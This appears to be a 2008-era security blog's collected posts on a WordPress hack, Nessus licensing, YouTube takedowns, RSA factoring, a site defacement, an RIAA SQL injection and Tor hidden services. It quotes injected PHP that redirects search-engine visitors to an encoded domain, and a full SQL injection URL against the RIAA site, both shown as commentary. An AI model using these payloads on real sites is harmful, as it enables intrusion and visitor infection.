Zeroday 01100100011010010

Thanks to co-author Brandon Palmen for the heads up to a Wordpress hack in progress. The attackers are using a few obfuscation tricks to inject code into Wordpress installations using a recently announced vulnerability. More details in a well written write up here.

The code snippets from a digitalpoint.com forum are shown using base64 encoding to hide the true destination:


<php>
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");

if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
></php>


This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.

Disturbing news of a hacked blogger in China. This is not a simple DBD setup involving iframes. This was a highly targeted and politically motivated attack. The attackers not only posted a personal picture of her with instructions for viewers to assault her on the street but managed to infiltrate her Skype account.

Dear Nessus Community,

On behalf of Tenable Network Security, we would like to thank you for making Tenable’s Nessus®
vulnerability scanner the most widely used scanner in the world. Over the last five years, we have seen
Nessus grow globally to over 5 million downloads and we have been there every step of the way. The core
Nessus engine is powered by our world-class vulnerability research content which includes over 20,000
plugins, enhanced features such as IPv6 scanning, free mailing lists, online search tools and free clients.
Nessus has become not only a popular tool for conducting security audits but we have extended its
capabilities to conduct agent-less patch audits and configuration audits, as well as locating sensitive data.
Looking forward, we plan to further increase functionality, such as SMBv2 support to better audit Windows
2008 and Windows Vista, and further expand our abilities to conduct even more comprehensive vulnerability
and configuration audits.

In the process, the Nessus scanning engine has been provided to our rapidly growing community as a free
download with research content licensed through two plugin subscriptions. Our Nessus users know these as
the “Registered Feed” and the “Direct Feed” subscriptions. These subscriptions have been available for over
three years and have been utilized by countless individuals, consultants, companies, governments and other
organizations.

We continually interact with the Nessus community and review our capabilities to ensure Nessus continues
to meet and exceed the needs of its users. Since creating and releasing the subscriptions, two distinct user
groups emerged. They are the home user and the commercial user. To better reflect the needs our
community, we have decided to update our Subscription licensing policy and are announcing the planned
change (as outlined below and accompanied by a FAQ) that will go into effect on July 31st, 2008.

First, we will continue to enable all users to download Nessus for free.

Second, due to computers and personal networks having become ubiquitous in homes around the
world, Tenable will launch a “HomeFeed” with all Nessus vulnerability plugin updates for home users
at no charge and with no delay. We are excited to offer the latest vulnerability checks for
personal, non-commercial use and strongly encourage home users to audit their computers and
networks for the newest security flaws.

Finally, Tenable’s “Direct Feed” will be re-named to the “ProfessionalFeed” and the “Registered Feed”
will be discontinued. The ProfessionalFeed will entitle subscribers to the latest vulnerability and
patch audits, configuration and content audits and commercial support for their Nessus 3
installation. The ProfessionalFeed will serve as Tenable’s commercial subscription and will be
required for individuals and organizations that want to use Tenable’s Nessus plugins commercially.

The decision to alter the licensing policy is the result of significant deliberation and will benefit both home
users and commercial users. The change will ensure our ability to invest in the future roadmap for Nessus
and to expand our research, support and training capabilities to serve our growing community. We realize
this may affect some individuals, corporations and organizations that use the currently available “Registered
Feed” in production audits and commercial services. Because of this, Tenable is offering a 25 percent rebate
for the Direct Feed subscription service (normally available at $1200 per year), beginning May 14, 2008 until
July 31, 2008 only when purchased through Tenable’s e-commerce site.
Additionally, we understand that there are those in the Nessus community that serve broad social and
educational objectives and we want to make certain that qualified charitable and information security
teaching/training organizations have access to the ProfessionalFeed free of charge. To this end, Tenable will
provide ProfessionalFeed subscriptions to charity and teaching/training organizations at no cost for those
that qualify.
As always, Tenable will continue to perform the in-depth research, testing and development to keep Nessus
the leading vulnerability and network auditing tool available to both home and professional users.

excerpt directly from Tenable Network Security, Inc.

The other day I received an email about a new Anonymous vs. Scientology dispute on Youtube. The enterbulation forum reported that Tory Christman, a very vocal critic of Scientology, had her Youtube account suspended. This time it looks as though Mark Bunker (wise beard man) has had many of his videos taken down as Terms of Service violations. Roughly 90 of his videos appear to be down at this time. You can view these takedowns as we discover them at Youtomb
[disclosure: I am an active team member of the Youtomb project]
[update: the enterbulation forum has also confirmed this account suspension on the same thread on page 21]

I’ve created a CSV of the videos affected here.
Because Wordpress won’t let me upload .CSV I have named the file .txt. Rename it to .CSV and use your favorite spreadsheet software to view it.

Given the history of Mark Bunker one has to wonder what Scientology told Youtube in order to have his account shutdown. As one can see from the data collected all the public is told is that there was a Terms of Service violation. we have no idea what those violations might be.

The next time someone raves about the advances of computing ask them about this challenge. Truly a benchmark for the next 100 years in computing a paper published by Adi Shamir and Eran Tromer entitled “On the Cost of Factoring RSA-1024″ [pdf] hypothesizes a device which could “break a 1024-bit RSA key in one year using a devices whose cost is about $10M”. emphasis mine.
$10M is a sizable amount of start up cost so this type of power certainly isn’t going to fall into the hands of criminal organizations (maybe narco lords in South America) but defense agencies could certainly handle this type of cost. It isn’t difficult to imagine a scenario where a message is important enough to necessitate this type of effort. However advances such as perfect forward secrecy make even these herculean efforts less effective. Courts have been dealing with this issue in a different way. Some realize they can’t coerce a private key while others attempt to force decryption with the threat of jail time. My question is how well does Moore’s law really fit here? Using the simple 1/2 price in 1 year version of this axiom we can expect to crack 1024 bit keys with as little as $10k (in one year) 10 years from now.

While doing some research for the SOURCEboston pub crawl I wandered over to the Tommy Doyle web page. Clearly not a page visited often or cared for much by the owners since it has a anti-war page up stating:

Security :0 My test: 1

Who is ‘the real murder’ Bush? You or this baby?
[ - _ +]

Hacked BY Scientist/AYT

A haunting but beautiful arabic song plays in the background. the source of the mp3 is http://dosyalar.semazen.net/muzic/Esma1.mp3 but I can not in good conscience hotlink to the song. If anyone knows the folks at TD’s they might need to be notified to fix their server security. The really odd part is the Kendall page and the main page are unchanged. It is only the Harvard location page which contains this message.

Here is a mirror of the page

The following url was found on a popular aggregation site

http://riaa.com/news_room.php?resultpage=9&news_year_filter=2007%20UNION%20ALL%20SELECT%20BENCHMARK(100000000,MD5('asdf')),NULL,NULL,NULL,NULL%20--

broken down into component pieces the actual sql commands are easier to read:
UNION ALL SELECT
BENCHMARK(100000000,MD5(’asdf’))

,NULL,NULL,NULL,NULL –

We can see that the url parameters contain a mysql command to benchmark 10M md5 operations on the string ‘asdf’. The very clear and simple vector allowed some others to achieve content insertion and even possibly deletion. What is worse is that a malicious person could have easily planted an iframe in the content to infect every visitor of the RIAA website. They are clearly not conducting code reviews on the RIAA website since this type of SQL injection attack would be noticed by even the most novice of auditors. The Content Management System (CMS) used was known to be vulnerable so there were likely patches available.

As noted on several other blogs…
Psiphon is part of the CiviSec Project run by the Citizen Lab at the Munk Centre for International Studies at the University of Toronto. The CiviSec Project is funded by the Open Society Institute.

http://psiphon.civisec.org/

Tor is great if you are already encrypting your traffic. It isn’t the best idea if you are doing a lot of clear text related activities.

OSX Instructions here

The Tor Overview is worth reading through and I can see good uses for this type of tech for globe trotters who may need to bypass certain filters.

Some advanced tips:

If you want to forward multiple virtual ports for a single hidden service, just add more HiddenServicePort lines. If you want to run multiple hidden services from the same Tor client, just add another HiddenServiceDir line. All the following HiddenServicePort lines refer to this HiddenServiceDir line, until you add another HiddenServiceDir line:

HiddenServiceDir /usr/local/etc/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:8080

HiddenServiceDir /usr/local/etc/tor/other_hidden_service/
HiddenServicePort 6667 127.0.0.1:6667
HiddenServicePort 22 127.0.0.1:22

Wireless Users Groups
bawug.org Bay Area Wireless Users Group
nycwireless.net NYC Wireless Group
personaltelco.net Personal Telco Project
frars.org.uk FRARS Wireless lan working group
bawia.org Boston Area Wireless Internet Alliance
GBA 802.11 Greater Boston Area 802.11 Wireless Database
DC-WiFi Initiative Public WiFi advocates in Washington DC
Seattle Wireless Seattle Wireless group